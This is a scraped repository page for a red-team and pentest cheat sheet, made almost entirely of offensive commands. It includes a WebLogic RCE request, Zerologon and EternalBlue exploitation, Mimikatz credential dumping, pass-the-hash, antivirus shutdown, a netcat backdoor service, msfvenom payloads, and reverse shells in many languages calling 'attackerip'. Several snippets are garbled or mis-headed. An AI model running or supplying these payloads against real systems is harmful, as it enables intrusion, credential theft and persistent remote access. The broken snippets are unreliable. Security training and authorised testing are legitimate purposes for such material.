Need help with A-Red-Teamer-diaries?
Click the “chat” button below for chat support from the developer who created it, or find similar developers for support.

About the developer

424 Stars 113 Forks 46 Commits 0 Opened issues


RedTeam/Pentest notes and experiments tested on several infrastructures related to professional engagements.

Services available


Need anything else?

Contributors list

# 66,083
44 commits

A Red-Teamer diaries

Publicly accessible notes about my pentesting/red teaming experiments tested on several controlled environments/infrastructures that involve playing with various tools and techniques used by penetration testers and redteamers during a security assessment.

  • [x] Project in progress


We welcome contributions as github pull requests.
Kudos and thanks for the people who did the hard stuff


  • Pentest/red team cheatsheet that collects snippets of codes and commands to help pentester during an engagement(saving time/fast search for a specific command).
  • Understand how the attacks can be performed
  • take notes for future reference


For educational purposes only, use it at your own responsibility.

Intrusion Kill Chain


Mapping the Network

Gather information about the Domain name and windows machine running in the network

bash$ cd /usr/share/Responder/tools
bash$ sudo python -i


bash$ responder-RunFinger


Scanning IP networks for NetBIOS name information.

bash$ sudo nbtscan -v -s :

Crackmapexec v 4.0

Scan the network range based on the SMB information

bash$ cme smb

Nmap scan

Scan all the machine network and save the outputs . * -oA options : Means output with all format * -T4 : Fast scan

Fast Scan

bash$ nmap -p 1-65535 -sV -sS -T4 -oA output target_IP  
Intensive Scan (Note recommended):
bash$ nmap -p 1-65535 -Pn -A -oA output target_IP 
Scan with enumeration of the running services version : * -sC : default scripts Equivalent to --script=default * -sV : Get the service version
bash$ nmap -sC -sV -oA output target

Angry IP scanner

Download the tool from this link : Angry IP Scanner * Change the preferences settings

Go to : Preferences -> Ports -> add 80,445,554,21 ,22 in the port selection
Go to : Preferences -> Display -> select Alive Hosts
Go to : Preferences -> Pinging -> select Combained (UDP/TCP)

Lateral Movement and Exploitation

Scanning for Zerologon

SecuraBV zerologon scanner
We can use crackmapexec to extract the DC name

bash$ python3 EXAMPLE-DC
If the target is vulnerable the scanner showing the following output: zerologon scanner

Exploiting zerologon

  • The exploit could reset the domain admin password we can use zer0dump exploit instead
  • Dumping The admin password (change the username if only one user is targetted )

dump NTLM

Getting an RCE through pass-the-hash RCE

The provided screenshots are related to a personnel lab used for the POC test only, be careful when running the exploit on DC in PROD(during an engagement)

BIGIP F5 CVE-2020-5902

Check if the target is vulnerable

curl -sk 'https://{host}/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd'
We can scan the target using Nuclei or Nmap too * Nuclei
nuclei -t ~/tool/nuclei/nuclei-templates/cves/CVE-2020-5902.yaml -target https://
If multiple hosts are specified use -l argument -> -l bigip-assets.txt * Nmap
nmap -p443 {IP} --script=http-vuln-cve2020-5902.nse


we can use Metasploit Module

Scanning Weblogic CVE-2020-14882

Nuclei Module

nuclei -t nuclei-templates/cves/CVE-2020-14882.yaml -target http://
This module sometimes fails, use -proxy-url to redirect traffic into Burpsuite and investigate.

Exploiting Weblogic CVE-2020-14882 - RCE

POST /console/css/%252e%252e%252fconsole.portal HTTP/1.1
cmd: chcp 65001&&whoami&&ipconfig
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 1258

_nfpb=true&_pageLabel=&" executeThread = ( Thread.currentThread(); adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); ");

  • Change cmd in the request header with any system command(Win/Linux)
  • Payload could be turned into a curl command. ## Scanning for EternalBlue ms17-010
    bash$ nmap -p445 --script smb-vuln-ms17-010 /24
    If the target is vulnrable the output is as following

Script Output
Host script results:

| smb-vuln-ms17-010:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|     Disclosure date: 2017-03-14
|     References:

Exploiting Eternal Blue - Metasploit Module (Windows 7 x64 only )

  • Note :
    The default Module supported by Metasploit is exploiting only windows 7 x64 bit Otherwise the target will be crashed .
msf > use exploit/windows/smb/ms17_010_eternalblue
      msf exploit(ms17_010_eternalblue) > show targets
      msf exploit(ms17_010_eternalblue) > set TARGET 
      msf exploit(ms17_010_eternalblue) > show options
   and set options...
      msf exploit(ms17_010_eternalblue) > exploit

Mimikatz - Metasploit

After obtaining a meterpreter shell, we need to ensure that our session is running with SYSTEM level privileges for Mimikatz to function properly.

meterpreter > getuid
Server username: WINXP-E95CE571A1\Administrator

meterpreter > getsystem system (via technique 1).

meterpreter > getuid Server username: NT AUTHORITY\SYSTEM

Reading Hashes and Passwords from Memory

meterpreter > load mimikatz
Loading extension mimikatz...success.

meterpreter > msv [+] Running as SYSTEM [*] Retrieving msv credentials msv credentials ===============

AuthID Package Domain User Password

0;78980 NTLM WINXP-E95CE571A1 Administrator lm{ 00000000000000000000000000000000 }, ntlm{ d6eec67681a3be111b5605849505628f } 0;996 Negotiate NT AUTHORITY NETWORK SERVICE lm{ aad3b435b51404eeaad3b435b51404ee }, ntlm{ 31d6cfe0d16ae931b73c59d7e0c089c0 } 0;997 Negotiate NT AUTHORITY LOCAL SERVICE n.s. (Credentials KO) 0;56683 NTLM n.s. (Credentials KO) 0;999 NTLM WORKGROUP WINXP-E95CE571A1$ n.s. (Credentials KO)

meterpreter > kerberos [+] Running as SYSTEM [*] Retrieving kerberos credentials kerberos credentials ====================

AuthID Package Domain User Password

0;56683 NTLM
0;78980 NTLM WINXP-E95CE571A1 Administrator SuperSecretPassword

meterpreter > mimikatz_command -f sekurlsa::searchPasswords [0] { Administrator ; WINXP-E95CE571A1 ; SuperSecretPassword }

meterpreter > mimikatz_command -f sekurlsa::logonpasswords

Mimikatz on Linux

In case no VM is available

step 1

winetricks msasn1

step 2

╰─>$ wine /usr/share/windows-resources/mimikatz/Win32/mimikatz.exe
0009:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.

.#####. mimikatz 2.2.0 (x86) #18362 May 13 2019 01:34:39 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo)

/ \ ## /*** Benjamin DELPY gentilkiwi ( [email protected] )

\ / ## >

'## v ##' Vincent LE TOUX ( [email protected] ) '#####' > / ***/

mimikatz #

Privilege Escalation of Windows


JuicyPotato.exe -l  -p c:\windows\system32\cmd.exe -t * 

Migrate Process

msf > ps
msf exploit(bypassuac) > migrate 

Windows Escalate UAC Protection Bypass

msf > use exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit

Windows Escalate UAC Protection Bypass (In Memory Injection)

msf > use exploit/windows/local/bypassuac_injection
msf exploit(bypassuac_injection) > set session 1
msf exploit(bypassuac_injection) > exploit

Windows Escalate UAC Protection Bypass (Script Host Vulnerability)

msf > use windows/local/bypassuac_vbs
msf exploit(bypassuac_vbs) > set session 1
msf exploit(bypassuac_vbs) > exploit

Windows Escalate UAC Execute RunAs

msf > use windows/local/ask
msf exploit(ask) > set session 1
msf exploit(ask) > exploit

MS16-032 Secondary Logon Handle Privilege Escalation Windows 7 32 bit

msf > use windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > set session 1
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit

Windows NTUserMessageCall Win32k Kernel Pool Overflow (Schlamperei)

msf exploit(ms13_053_schlamperei) >set session 1
msf exploit(ms13_053_schlamperei) >exploit

Crackmapexec V4.0

Enemurate target

bash$ cme smb  

Access to machine by valid username/password

bash$ cme smb  -u username -p password

Access to machine using the NTLM hash (if u see PWN3D the user hash administrator priveleges )

bash$ cme smb  -u username -H hash
Listing shares
bash$ cme smb  -u username -p password --shares

Enumerate active sessions

bash$ cme smb  -u username -p password --sessions
Enumerate users by bruteforcing RID's (default: 4000)
bash$ cme smb  -u username -p password --rid-brute

Execute the specified command

bash$ cme smb  -u username -p password -x 'whoami'
Execute the specified PowerShell command
bash$ cme smb  -u username -p password -X 'whoami'

Get Hashes

bash$ cme smb  -u username -p password --sam

Crackmapexec to Empire agent

First setup an Empire listener: ``` (Empire: listeners) > set Name test (Empire: listeners) > set Host (Empire: listeners) > set Port 9090 (Empire: listeners) > set CertPath data/empire.pem (Empire: listeners) > run (Empire: listeners) > list

[*] Active listeners:

ID Name Host Type Delay/Jitter KillDate Redirect Target

1 test native 5/0.0

(Empire: listeners) > ```

Start up Empire's RESTful API server: ```

~ python empire --rest --user empireadmin --pass Password123!

[*] Loading modules from: /home/byt3bl33d3r/Tools/Empire/lib/modules/ * Starting Empire RESTful API on port: 1337 * RESTful API token: l5l051eqiqe70c75dis68qjheg7b19di7n8auzml * Running on (Press CTRL+C to quit)

The username and password that CME uses to authenticate to Empire's RESTful API are stored in the cme.conf file located at ~/.cme/cme.conf:
[Empire] apihost= apiport=1337 username=empireadmin password=Password123!

[Metasploit] rpchost= rpcport=55552 password=abc123

Then just run the empire_exec module and specify the listener name:

~ crackmapexec -u username -p password -M empire_exec -o LISTENER=test

# Crackmapexec to Meterpreter
We can use the metinject module to directly inject meterpreter into memory using PowerSploit's Invoke-Shellcode.ps1 script.

First setup your handler:

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reversehttps payload => windows/meterpreter/reversehttps msf exploit(handler) > set LHOST LHOST => msf exploit(handler) > set exitonsession false exitonsession => false msf exploit(handler) > exploit -j [*] Exploit running as background job.

[] Started HTTPS reverse handler on msf exploit(handler) > [] Starting the payload handler...

Then just run the metinject module and specify the LHOST and LPORT values:

~ crackmapexec -u username -p password -M metinject -o LHOST=192.168.1

# Passing shell from Empire to Meterpreter metasploit 

metasploit listner options

msf > use exploit/multi/handler msf exploit(handler) > set payload windows/meterpreter/reversehttp payload => windows/meterpreter/reversehttp msf exploit(handler) > set lhost lhost => msf exploit(handler) > set lport 2286 lport => 2286 msf exploit(handler) > set ExitOnSession false ExitOnSession => false msf exploit(handler) > set SessionCommunicationTimeout 0 SessionCommunicationTimeout => 0 msf exploit(handler) > exploit -j ```

Setup Empire to send the agent to Metasploit

use module code_execution/shellcode_inject
set Host 
set Port 


# Start the Empire console and RESTful API
python empire --rest --username empireadmin --password Password123

Then grab, setup and run DeathStar: ``` git clone

Death Star is written in Python3

pip3 install -r requirements.txt ./ ```

Windows cmd.exe commands

Add user

net user /add [username] [password]

Add User as an admin

net localgroup administrators [username] /add

Add user to RDP group

NET LOCALGROUP "Remote Desktop Users" keyoke /ADD

PTH_winexe : open shell without psexec

Example :

pth-winexe -U DOMAIN/USERNAME%cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb //IP_Server cmd.exe

Real Example :

pth-winexe -U LAB/Administrator%cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb // cmd.exe

PTH-winexe to Meterpreter

msf exploit(web_delivery) > use exploit/multi/script/web_delivery 
msf exploit(web_delivery) > set target 2
target => 2         
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set L
set LHOST         set LISTENERCOMM  set LOGLEVEL      set LPORT         
msf exploit(web_delivery) > set LHOST
msf exploit(web_delivery) > set LPORT 1233
LPORT => 1233
msf exploit(web_delivery) > exploit 
[*] Exploit running as background job 0.

[!] You are binding to a loopback address by setting LHOST to Did you want ReverseListenerBindAddress? [] Started reverse TCP handler on [] Using URL: msf exploit(web_delivery) > [] Local IP: [] Server started. [*] Run the following command on the target machine: powershell.exe -nop -w hidden -c $j=new-object net.webclient;$j.proxy=[Net.WebRequest]::GetSystemWebProxy();$j.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $j.downloadstring('');

Copy the powershell command into the cmd opened with pth_winexe

Active Directory

# current domain info

domain trusts


current forest info

get forest trust relationships

(System.DirectoryServices.ActiveDirectory.Forest::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()

get DCs of a domain

nltest /dclist:offense.local net group "domain controllers" /domain

get DC for currently authenticated session

nltest /dsgetdc:offense.local

get domain trusts from cmd shell

nltest /domain_trusts

get user info

nltest /user:"spotless"

get DC for currently authenticated session

set l

get domain name and DC the user authenticated to


get all logon sessions. Includes NTLM authenticated sessions

klist sessions

kerberos tickets for the session


cached krbtgt

klist tgt

whoami on older Windows systems

set u


powershell-import /path/to/BloodHound.ps1
powershell Get-BloodHoundData | Export-BloodHoundCSV

Symantec AV Bypass

During our latest pentest, we faced shitty AV problem since we couldn't get any meterpreter session with psexec cuz of Symatec AV, So we would like to share our solution for this problem:
First We Need to connect with the local admin as system using pth (local hash extracted with bkhive and samdump2)

$./pth-winexe -U DOMAIN.COM/USERNAME%cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb // cmd --system

Then let's Stop the AV Service

cd "C:\Program Files\Symantec\Symantec Endpoint Protection" smc.exe -stop

Nice now we got rid of the AV, however our payload and IP was still blocked since they use an IPS so we used a reverse_https listener and psexec_psh to bypass it: [email protected]:~$ msfconsole use exploit/windows/smb/psexec_psh set payload windows/meterpreter/reverse_https set StageEncoder x86/shikata_ga_nai set EnableStageEncoding true set SMBUSER USERNAME set SMBPASS cc5e9acbad1b25c9aad3b435b51404ee:996e6760cddd8815a2c24a110cf040fb set lhost IP set lport 443 exploit -j and BOOM :D Server username: NT AUTHORITY\SYSTEM Enjoy your Session

Kiwi collect credentials

meterpreter > load kiwi
meterpreter > cred_all


Nmap Full Web Vulnerable Scan

cd /usr/share/nmap/scripts/
wget && tar xzf nmap_nse_vulscan-2.0.tar.gz
nmap -sS -sV --script=vulscan/vulscan.nse target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv target
nmap -sS -sV --script=vulscan/vulscan.nse –script-args vulscandb=scipvuldb.csv -p80 target
nmap -PN -sS -sV --script=vulscan –script-args vulscancorrelation=1 -p80 target
nmap -sV --script=vuln target
nmap -PN -sS -sV --script=all –script-args vulscancorrelation=1 target

Dirb Dir Bruteforce

dirb http://IP:PORT /usr/share/dirb/wordlists/common.txt

Nikto web server scanner

nikto -C all -h http://IP

WordPress Scanner

git clone && cd wpscan
./wpscan –url http://IP/ –enumerate p

HTTP Fingerprinting

wget && unzip
cd httprint_301/linux/
./httprint -h http://IP -s signatures.txt

WordPress Scanner

git clone && cd wpscan
./wpscan –url http://IP/ –enumerate p

SKIP Fish Scanner

skipfish -m 5 -LY -S /usr/share/skipfish/dictionaries/complete.wl -o ./skipfish2 -u http://IP

Nmap Ports Scan

1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
1)decoy- masqurade nmap -D RND:10 [target] (Generates a random number of decoys)
3)data packed – like orginal one not scan packet
4)use auxiliary/scanner/ip/ipidseq for find zombie ip in network to use them to scan — nmap -sI ip target
5)nmap –source-port 53 target
nmap -sS -sV -D IP1,IP2,IP3,IP4,IP5 -f –mtu=24 –data-length=1337 -T2 target ( Randomize scan form diff IP)
nmap -Pn -T2 -sV –randomize-hosts IP1,IP2
nmap –script smb-check-vulns.nse -p445 target (using NSE scripts)
nmap -sU -P0 -T Aggressive -p123 target (Aggresive Scan T1-T5)
nmap -sA -PN -sN target
nmap -sS -sV -T5 -F -A -O target (version detection)
nmap -sU -v target (Udp)
nmap -sU -P0 (Udp)
nmap -sC (all scan default)

NC Scanning

nc -v -w 1 target -z 1-1000
for i in {101..102}; do nc -vv -n -w 1 192.168.56.$i 21-25 -z; done


us -H -msf -Iv -p 1-65535
us -H -mU -Iv -p 1-65535

-H resolve hostnames during the reporting phase -m scan mode (sf - tcp, U - udp) -Iv - verbose

Xprobe2 OS fingerprinting

xprobe2 -v -p tcp:80:open IP

Samba Enumeration

nmblookup -A target
smbclient //MOUNT/share -I target -N
rpcclient -U "" target
enum4linux target

SNMP Enumeration

snmpget -v 1 -c public IP
snmpwalk -v 1 -c public IP
snmpbulkwalk -v2c -c public -Cn0 -Cr10 IP

Windows Useful cmds

net localgroup Users
net localgroup Administrators
search dir/s *.doc
system("start cmd.exe /k $cmd")
sc create microsoft_update binpath="cmd /K start c:\nc.exe -d ip-of-hacker port -e cmd.exe" start= auto error= ignore
/c C:\nc.exe -e c:\windows\system32\cmd.exe -vv 7779
mimikatz.exe "privilege::debug" "log" "sekurlsa::logonpasswords"
Procdump.exe -accepteula -ma lsass.exe lsass.dmp
mimikatz.exe "sekurlsa::minidump lsass.dmp" "log" "sekurlsa::logonpasswords"
C:\temp\procdump.exe -accepteula -ma lsass.exe lsass.dmp For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe lsass.dmp For 64 bits

PuTTY Link tunnel

Forward remote port to local address
cmd.exe /c echo y | .\plink.exe -P 22 -l  -pw "password" -R PORT_TO_FORWARD:  2>&1

Meterpreter portfwd

# forward remote port to local address
meterpreter > portfwd add –l 3389 –p 3389 –r
kali > rdesktop

Enable RDP Access

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0
netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Turn Off Windows Firewall

netsh firewall set opmode disable

Meterpreter VNC\RDP

git clone
sekurlsa::logonPasswords full

Mimikatz use

net user test 1234 /add
net localgroup administrators test /add

Passing the Hash

git clone
pth-winexe -U hash //IP cmd


apt-get install freerdp-x11 xfreerdp /u:offsec /d:win2012 /pth:HASH /v:IP


meterpreter > run post/windows/gather/hashdump Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c::: msf > use exploit/windows/smb/psexec msf exploit(psexec) > set payload windows/meterpreter/reverse_tcp msf exploit(psexec) > set SMBPass e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c msf exploit(psexec) > exploit meterpreter > shell

Hashcat password cracking

hashcat -m 400 -a 0 hash /root/rockyou.txt

Netcat examples

c:> nc -l -p 31337
#nc 31337
c:> nc -v -w 30 -p 31337 -l < secret.txt
#nc -v -w 2 31337 > secret.txt

Banner grabbing with NC

nc 80
GET / HTTP/1.1
User-Agent: Mozilla/4.0

Window reverse shell

c:>nc -Lp 31337 -vv -e cmd.exe
nc 31337
c:>nc 80 -e cmd.exe
nc -lp 80

nc -lp 31337 -e /bin/bash nc 31337 nc -vv -r(random) -w(wait) 1 -z(i/o error) 1-1000

Find SUID\SGID root files

# Find SUID root files
find / -user root -perm -4000 -print

Find SGID root files:

find / -group root -perm -2000 -print

Find SUID and SGID files owned by anyone:

find / -perm -4000 -o -perm -2000 -print

Find files that are not owned by any user:

find / -nouser -print

Find files that are not owned by any group:

find / -nogroup -print

Find symlinks and what they point to:

find / -type l -ls

Python shell

python -c 'import pty;pty.spawn("/bin/bash")'

Python\Ruby\PHP HTTP Server

python2 -m SimpleHTTPServer
python3 -m http.server
ruby -rwebrick -e " => 8888, :DocumentRoot => Dir.pwd).start"
php -S

Get PIDs of process

fuser -nv tcp 80
fuser -k -n tcp 80

Hydra rdp Bruteforce

hydra -l admin -P /root/Desktop/passwords -S X.X.X.X rdp

Mount Remote Windows Share

smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw

Compiling Exploit in Kali

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Compiling Windows Exploits on Kali

c:>nc -Lp 31337 -vv -e cmd.exe
nc 31337
c:>nc 80 -e cmd.exe
nc -lp 80

nc -lp 31337 -e /bin/bash nc 31337 nc -vv -r(random) -w(wait) 1 -z(i/o error) 1-1000

Window reverse shell

wget -O mingw-get-setup.exe
wine mingw-get-setup.exe
select mingw32-base
cd /root/.wine/drive_c/windows
wget && unzip
cd /root/.wine/drive_c/MinGW/bin
wine gcc -o ability.exe /tmp/exploit.c -lwsock32
wine ability.exe

NASM Commands

nasm -f bin -o payload.bin payload.asm
nasm -f elf payload.asm; ld -o payload payload.o; objdump -d payload

SSH Pivoting

ssh -D -p 22 [email protected]
Add socks4 1080 in /etc/proxychains.conf
proxychains commands target

SSH Pivoting from One Network to Another

ssh -D -p 22 [email protected]
Add socks4 1080 in /etc/proxychains.conf
proxychains ssh -D -p 22 [email protected]
Add socks4 1081 in /etc/proxychains.conf
proxychains commands target

Pivoting Using metasploit

route add X.X.X.X 1
use auxiliary/server/socks4a
proxychains msfcli windows/* PAYLOAD=windows/meterpreter/reverse_tcp LHOST=IP LPORT=443 RHOST=IP E


meterpreter > ipconfig IP Address : meterpreter > run autoroute -s meterpreter > run autoroute -p Session 1 meterpreter > Ctrl+Z msf auxiliary(tcp) > use exploit/windows/smb/psexec msf exploit(psexec) > set RHOST msf exploit(psexec) > exploit meterpreter > ipconfig IP Address :

Exploit-DB search using CSV File

git clone
cd exploit-database
./searchsploit –u
./searchsploit apache 2.2
./searchsploit "Linux Kernel"

cat files.csv | grep -i linux | grep -i kernel | grep -i local | grep -v dos | uniq | grep 2.6 | egrep "

MSF Payloads

msfvenom -p windows/meterpreter/reverse_tcp LHOST= X > system.exe
msfvenom -p php/meterpreter/reverse_tcp LHOST= LPORT=443 R > exploit.php
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e -a x86 --platform win -f asp -o file.asp
msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT=443 -e x86/shikata_ga_nai -b "\x00" -a x86 --platform win -f c

MSF Linux Reverse Meterpreter Binary

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST= LPORT=443 -e -f elf -a x86 --platform linux -o shell

MSF Reverse Shell (C Shellcode)

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -b "\x00\x0a\x0d" -a x86 --platform win -f c

MSF Reverse Shell Python Script

msfvenom -p cmd/unix/reverse_python LHOST= LPORT=443 -o

MSF Reverse ASP Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f asp -a x86 --platform win -o shell.asp

MSF Reverse Bash Shell

msfvenom -p cmd/unix/reverse_bash LHOST= LPORT= -o

MSF Reverse PHP Shell

msfvenom -p php/meterpreter_reverse_tcp LHOST= LPORT= -o shell.php

MSF Reverse Win Bin

msfvenom -p windows/meterpreter/reverse_tcp LHOST= LPORT= -f exe -a x86 --platform win -o shell.exe

Linux Security Commands

# find programs with a set uid bit
find / -uid 0 -perm -4000

find things that are world writable

find / -perm -o=w

find names with dots and spaces, there shouldn’t be any

find / -name " " -print find / -name ".." -print find / -name ". " -print find / -name " " -print

find files that are not owned by anyone

find / -nouser

look for files that are unlinked

lsof +L1

get information about procceses with open ports

lsof -i

look for weird things in arp

arp -a

look at all accounts including AD

getent passwd

look at all groups and membership including AD

getent group

list crontabs for all users including AD

for user in $(getent passwd|cut -f1 -d:); do echo "### Crontabs for $user ####"; crontab -u $user -l; done

generate random passwords

cat /dev/urandom| tr -dc ‘a-zA-Z0-9-[email protected]#$%^&*()+{}|:<>?=’|fold -w 12| head -n 4

find all immutable files, there should not be any

find . | xargs -I file lsattr -a file 2>/dev/null | grep ‘^….i’

fix immutable files

chattr -i file

Win Buffer Overflow Exploit Commands

msfvenom -p windows/shell_bind_tcp -a x86 --platform win -b "\x00" -f c
msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=443 -a x86 --platform win -e x86/shikata_ga_nai -b "\x00" -f c

COMMONLY USED BAD CHARACTERS: \x00\x0a\x0d\x20 For http request \x00\x0a\x0d\x20\x1a\x2c\x2e\3a\x5c Ending with (0\n\r_)

Useful Commands:

pattern create pattern offset (EIP Address) pattern offset (ESP Address) add garbage upto EIP value and add (JMP ESP address) in EIP . (ESP = shellcode )

!pvefindaddr pattern_create 5000 !pvefindaddr suggest !pvefindaddr modules !pvefindaddr nosafeseh

!mona config -set workingfolder C:\Mona%p !mona config -get workingfolder !mona mod !mona bytearray -b "\x00\x0a" !mona pc 5000 !mona po EIP !mona suggest

SEH - Structured Exception Handling

!mona suggest
!mona nosafeseh
nseh="\xeb\x06\x90\x90" (next seh chain)
iseh= !pvefindaddr p1 -n -o -i (POP POP RETRUN or POPr32,POPr32,RETN)


!mona modules
!mona ropfunc -m *.dll -cpb "\x00\x09\x0a"
!mona rop -m *.dll -cpb "\x00\x09\x0a" (auto suggest)

ASLR - Address space layout randomization

!mona noaslr

EGG Hunter techniques

!mona jmp -r esp
!mona egg -t lxxl
\xeb\xc4 (jump backward -60)
!mona egg -t 'w00t'

GDB Debugger Commands

# Setting Breakpoint
break *_start

Execute Next Instruction

next step n s

Continue Execution

continue c


checking 'REGISTERS' and 'MEMORY'

Display Register Values: (Decimal,Binary,Hex)

print /d –> Decimal print /t –> Binary print /x –> Hex O/P : (gdb) print /d $eax $17 = 13 (gdb) print /t $eax $18 = 1101 (gdb) print /x $eax $19 = 0xd (gdb)

Display values of specific memory locations

command : x/nyz (Examine) n –> Number of fields to display ==> y –> Format for output ==> c (character) , d (decimal) , x (Hexadecimal) z –> Size of field to be displayed ==> b (byte) , h (halfword), w (word 32 Bit)

BASH Reverse Shell

bash -i >& /dev/tcp/X.X.X.X/443 0>&1

exec /bin/bash 0&0 2>&0 exec /bin/bash 0&0 2>&0

0/dev/tcp/attackerip/4444; sh &196 2>&196

0/dev/tcp/attackerip/4444; sh &196 2>&196

exec 5<>/dev/tcp/attackerip/4444 cat &5 >&5; done # or: while read line 0&5 >&5; done exec 5<>/dev/tcp/attackerip/4444

cat &5 >&5; done # or: while read line 0&5 >&5; done

/bin/bash -i > /dev/tcp/attackerip/8080 0&1 /bin/bash -i > /dev/tcp/X.X.X.X/443 0&1

PERL Reverse Shell

perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"attackerip:443");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

for win platform

perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"attackerip:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' perl -e 'use Socket;$i="";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’

RUBY Reverse Shell

ruby -rsocket -e 'exit if fork;"attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print}end'

for win platform

ruby -rsocket -e '"attackerip","443");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print}end' ruby -rsocket -e '"attackerip","443").to_i;exec sprintf("/bin/sh -i &%d 2>&%d",f,f,f)'

PYTHON Reverse Shell

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("attackerip",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);["/bin/sh","-i"]);'

PHP Reverse Shell

php -r '$sock=fsockopen("attackerip",443);exec("/bin/sh -i &3 2>&3");'

JAVA Reverse Shell

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/attackerip/443;cat &5 >&5; done"] as String[])

NETCAT Reverse Shell

nc -e /bin/sh attackerip 4444
nc -e /bin/sh 443

If the -e option is disabled, try this

mknod backpipe p && nc attackerip 443 0backpipe

/bin/sh | nc attackerip 443 rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4443 0/tmp/

If you have the wrong version of netcat installed, try

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip >/tmp/f

TELNET Reverse Shell

# If netcat is not available or /dev/tcp
mknod backpipe p && telnet attackerip 443 0backpipe

XTERM Reverse Shell

# Start an open X Server on your system (:1 – which listens on TCP port 6001)
apt-get install xnest
Xnest :1

Then remember to authorise on your system the target IP to connect to you

xterm -display

Run this INSIDE the spawned xterm on the open X Server

xhost +targetip

Then on the target connect back to the your X Server

xterm -display attackerip:1 /usr/openwin/bin/xterm -display attackerip:1 or $ DISPLAY=attackerip:0 xterm

XSS Cheat Codes
("< iframes > src=http://IP:PORT  iframes >")




perl -e 'print "";' > out

(">< iframes < iframes >)

"> %253cscript%253ealert(document.cookie)%253c/script%253e ">alert(document.cookie) %22/%3E%3CBODY%20onload=’document.write(%22%3Cs%22%2b%22cript%20src='%3E

SSH Over SCTP (With Socat)

# on remote server
# assuming you want the SCTP socket to listen on port 80/SCTP and sshd is on 22/TCP
$ socat SCTP-LISTEN:80,fork TCP:localhost:22


replace SERVER_IP with IP of listening server, and 80 with whatever port the SCTP listener is on :)

$ socat TCP-LISTEN:1337,fork SCTP:SERVER_IP:80

create socks proxy

replace username and -p port value as needed...

